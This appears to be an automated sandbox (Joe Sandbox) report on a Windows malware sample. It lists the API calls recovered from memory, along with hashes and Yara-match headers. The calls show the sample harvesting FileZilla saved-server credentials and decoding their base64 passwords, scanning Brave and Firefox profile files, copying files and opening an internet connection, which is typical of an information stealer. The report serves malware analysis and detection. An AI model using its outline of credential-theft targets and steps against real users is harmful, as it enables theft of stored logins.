                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C8B
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D21
                              • lstrlen.KERNEL32(00E61794), ref: 00E41D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D55
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DED
                              • lstrlen.KERNEL32(00E61794), ref: 00E41E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E36
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E68
                              • lstrlen.KERNEL32(00D2DF28), ref: 00E41E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EB2
                              • lstrlen.KERNEL32(00E61794), ref: 00E41EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EE3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F15
                              • lstrlen.KERNEL32(00D2E3B8), ref: 00E41F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F5F
                              • lstrlen.KERNEL32(00E61794), ref: 00E41F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F90
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41FC2
                              • lstrlen.KERNEL32(00D1A4B0), ref: 00E41FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42036
                              • lstrlen.KERNEL32(00E61794), ref: 00E42048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42067
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E42073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42098
                              • lstrlen.KERNEL32(?), ref: 00E420AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E420D0
                              • lstrcat.KERNEL32(00000000,?), ref: 00E420DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42103
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4213F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E4214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42181
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: fbf8862cd6ecb45400ba403c3b33a4027c75f919804d759db6041e4d4ef1a90a
                              • Instruction ID: dec65cfae88f4953eeb8e4e3ca5a4df3d17e1498a8bc3add660c5ad98968ef39
                              • Opcode Fuzzy Hash: fbf8862cd6ecb45400ba403c3b33a4027c75f919804d759db6041e4d4ef1a90a
                              • Instruction Fuzzy Hash: 04629F309117169FCB22AF64EC4CAAE7BF9AF40708F046068FA85B7255DB35DD45CBA0
                              APIs
                              • wsprintfA.USER32 ref: 00E4392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E43943
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4396C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E43986
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E439BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E439E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E439F2
                              • lstrlen.KERNEL32(00E61794), ref: 00E439FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A1A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43A26
                              • lstrlen.KERNEL32(?), ref: 00E43A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A53
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A8A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E43ACE
                              • lstrlen.KERNEL32(?), ref: 00E43AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B36
                              • lstrlen.KERNEL32(00E61794), ref: 00E43B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B6A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B9E
                              • lstrlen.KERNEL32(?), ref: 00E43BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43BE0
                              • lstrlen.KERNEL32(00D28C08), ref: 00E43C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43C3C
                              • lstrlen.KERNEL32(00D28BB8), ref: 00E43C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43CB7
                              • lstrlen.KERNEL32(00E61794), ref: 00E43CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43CE8
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43D79
                              • lstrlen.KERNEL32(00E61794), ref: 00E43D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43DAD
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E43
                              • lstrlen.KERNEL32(00E61794), ref: 00E43E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E77
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F0D
                              • lstrlen.KERNEL32(00E61794), ref: 00E43F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F41
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F75
                              • lstrlen.KERNEL32(?), ref: 00E43F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43FE0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4401F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E4402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E440CE
                              • lstrcat.KERNEL32(00000000), ref: 00E440DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E442D9
                              • FindClose.KERNEL32(00000000), ref: 00E442E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: same set of dumps (E30000 through 14B4000) as listed for the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 9ae5a79b07ab7600c65316890eca7dc5545b98e80d7ac59e8451902baff8e655
                              • Instruction ID: ab0ad5362daf305ef5fd0c756a90c216f38d0d9a6afeb8b392090c12109fb2fc
                              • Opcode Fuzzy Hash: 9ae5a79b07ab7600c65316890eca7dc5545b98e80d7ac59e8451902baff8e655
                              • Instruction Fuzzy Hash: 2962A131A117169FCB21AF74E84DAAEBBF9AF40308F046128F985B7255DB35DE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E469C8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E46A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E46A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E46AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E46B35
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46B9D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: same set of dumps (E30000 through 14B4000) as listed for the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: 390493ed52a3a9e19d3dd15beedf787cb27b737a63e2cfb5c0ce127066da7f12
                              • Instruction ID: 13a20742e75efb351a977e0b78825a3f2a9df3df445318e0aa092601d12f2ce1
                              • Opcode Fuzzy Hash: 390493ed52a3a9e19d3dd15beedf787cb27b737a63e2cfb5c0ce127066da7f12
                              • Instruction Fuzzy Hash: EA42D170A01305AFDB21AFB4EC49BAE7BB9AF45708F146418FA81F7241DB35D901CBA1
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DBEF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E3DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC17
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E3DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC4C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DC8F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E3DCD0
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E3DCF0
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E3DD0A
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E3DD1D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DD7B
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDA3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DDAF
                              • lstrlen.KERNEL32(?), ref: 00E3DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DE19
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DE6F
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DE7B
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DEBB
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DEE6
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DEF2
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFA5
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DFB1
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DFF4
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E022
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3E02E
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 00E3E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E3E0E7
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E11F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E155
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E19F
                              • lstrcat.KERNEL32(00000000), ref: 00E3E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E1F9
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E22F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E261
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E3E269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E3E988
                              • FindClose.KERNEL32(00000000), ref: 00E3E997
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: same set of dumps (E30000 through 14B4000) as listed for the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: 04c3eb8e18a6c4323b22e557f7087923e51de70a3602787c750e4a58f79b7021
                              • Instruction ID: b912444bddc011db7945659b407fe716bc3b5d6a45beb6a1b8b4ce5520d3f503
                              • Opcode Fuzzy Hash: 04c3eb8e18a6c4323b22e557f7087923e51de70a3602787c750e4a58f79b7021
                              • Instruction Fuzzy Hash: D0527A70A113069FDB21AF68D88DAAE7FF9AF44308F046528F986B7255DB35DC05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E360FF
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36152
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36185
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E361B5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E361F0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E36233
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: same set of dumps (E30000 through 14B4000) as listed for the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 9820154ce23b5f1fb51abd6ca520898034848d210a51af03ec968c871d311dd9
                              • Instruction ID: 9cb8698f717e1b67967ce070820c2edc28275bdddb031d58103061ac2f8ab3b2
                              • Opcode Fuzzy Hash: 9820154ce23b5f1fb51abd6ca520898034848d210a51af03ec968c871d311dd9
                              • Instruction Fuzzy Hash: 98528B71900315AFDB21EFB4D849AAE7BF9AF44304F15A428F985BB251DB35EC01CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46B9D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BCD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BFD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00E46C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E46C43
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E46C5A
                              • lstrlen.KERNEL32(00000000), ref: 00E46C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E46CE2
                              • lstrlen.KERNEL32(00000000), ref: 00E46CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00E46D6A
                              • lstrlen.KERNEL32(00000000), ref: 00E46D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46DB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E46DF2
                              • lstrlen.KERNEL32(00000000), ref: 00E46E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E46E94
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E46EA8
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E46EC9
                              • LocalFree.KERNEL32(00000000), ref: 00E46ED4
                              • lstrlen.KERNEL32(?), ref: 00E46F6E
                              • lstrlen.KERNEL32(?), ref: 00E46F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: same set of dumps (E30000 through 14B4000) as listed for the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: a3e88cd16c91f2961d03ad34a565ee0cce56ad2532e9aa5bce385431adfd8489
                              • Instruction ID: 51997d53689d2c8ae64cf0f730bfbee1b0febfd57eb9406363e32a27ca833ea1
                              • Opcode Fuzzy Hash: a3e88cd16c91f2961d03ad34a565ee0cce56ad2532e9aa5bce385431adfd8489
                              • Instruction Fuzzy Hash: D502BF70A11315AFDB20ABB4EC4DAAE7BB9AF05708F146418F986F7241DB35D901CBA1
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44B7F
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E44B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BA7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E44BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E44BFA
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 58d6b7b32c7e8bb8255121bdba881947231a2eabb97e3c1e9c68f2bc27b0e5a2
                              • Instruction ID: b3e0b394725aa1cfbaeeb1db43bd7d887b5a014336cab6baafd2a8c89b6c3afe
                              • Opcode Fuzzy Hash: 58d6b7b32c7e8bb8255121bdba881947231a2eabb97e3c1e9c68f2bc27b0e5a2
                              • Instruction Fuzzy Hash: 33924F71A01701CFDB24CF29E548B69B7F5AF44318F2990ADE849AB3A6D776DC42CB40
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E41291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E412BF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E412CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412E7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E412F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4133A
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4135C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41376
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E413AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E413D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E413E2
                              • lstrlen.KERNEL32(00E61794), ref: 00E413ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4140A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41416
                              • lstrlen.KERNEL32(?), ref: 00E41423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41443
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4147A
                              • StrCmpCA.SHLWAPI(?,00D2E000), ref: 00E414A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E414E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41535
                              • StrCmpCA.SHLWAPI(?,00D2E158), ref: 00E41552
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E415BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E415E4
                              • StrCmpCA.SHLWAPI(?,00D2DFA0), ref: 00E41602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41633
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41685
                              • StrCmpCA.SHLWAPI(?,00D2DFB8), ref: 00E416B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E416F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41745
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E417F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4181C
                              • FindClose.KERNEL32(00000000), ref: 00E4182B
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: bc6ba3070ce1f91f9499cdfa9e31fd0fc63ffffa14ebaefde33bd34d795bc2a9
                              • Instruction ID: 3e3220b84c51346f6fb8181cc36018a63dbf5fce26bd384d28433fdc814d5595
                              • Opcode Fuzzy Hash: bc6ba3070ce1f91f9499cdfa9e31fd0fc63ffffa14ebaefde33bd34d795bc2a9
                              • Instruction Fuzzy Hash: 2D125D71A103069FDF24AF78E889AAE7BF8AF44308F15556CF986A7250DB34DC45CB90
                              APIs
                              • wsprintfA.USER32 ref: 00E4CBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4CC13
                              • lstrcat.KERNEL32(?,?), ref: 00E4CC5F
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4CC71
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4CC8B
                              • wsprintfA.USER32 ref: 00E4CCB0
                              • PathMatchSpecA.SHLWAPI(?,00D28C48), ref: 00E4CCE2
                              • CoInitialize.OLE32(00000000), ref: 00E4CCEE
                                • Part of subcall function 00E4CAE0: CoCreateInstance.COMBASE(00E5B110,00000000,00000001,00E5B100,?), ref: 00E4CB06
                                • Part of subcall function 00E4CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E4CB46
                                • Part of subcall function 00E4CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00E4CBC9
                              • CoUninitialize.COMBASE ref: 00E4CD09
                              • lstrcat.KERNEL32(?,?), ref: 00E4CD2E
                              • lstrlen.KERNEL32(?), ref: 00E4CD3B
                              • StrCmpCA.SHLWAPI(?,00E5CFEC), ref: 00E4CD55
                              • wsprintfA.USER32 ref: 00E4CD7D
                              • wsprintfA.USER32 ref: 00E4CD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 00E4CDB0
